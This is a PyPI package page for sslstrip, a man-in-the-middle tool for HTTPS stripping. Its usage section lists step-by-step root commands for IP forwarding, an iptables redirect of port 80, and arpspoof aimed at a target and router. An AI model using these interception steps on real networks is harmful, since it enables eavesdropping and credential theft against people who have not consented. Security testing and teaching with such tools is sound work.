A MITM tool that implements Moxie Marlinspike's HTTPS stripping attacks.

Navigation

Verified details

These details have been verified by PyPI
Maintainers
Avatar for Thomas.Grainger from gravatar.com Thomas.Grainger

Unverified details

These details have not been verified by PyPI
Project links
Meta

Project description

sslstrip is a MITM tool that implements Moxie Marlinspike’s SSL stripping attacks.

It requires Python 2.5 or newer, along with the ‘twisted’ python module.

Installing:

pip install sslstrip

Running:

sslstrip can be run from the source base without installation. Just run ‘python sslstrip.py -h’ as a non-root user to get the command-line options.

The four steps to getting this working (assuming you’re running Linux) are:

  1. Flip your machine into forwarding mode (as root): echo “1” > /proc/sys/net/ipv4/ip_forward

  2. Setup iptables to intercept HTTP requests (as root): iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <yourListenPort>

  3. Run sslstrip with the command-line options you’d like (see above).

  4. Run arpspoof to redirect traffic to your machine (as root): arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>

More Info:

http://www.thoughtcrime.org/software/sslstrip/

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page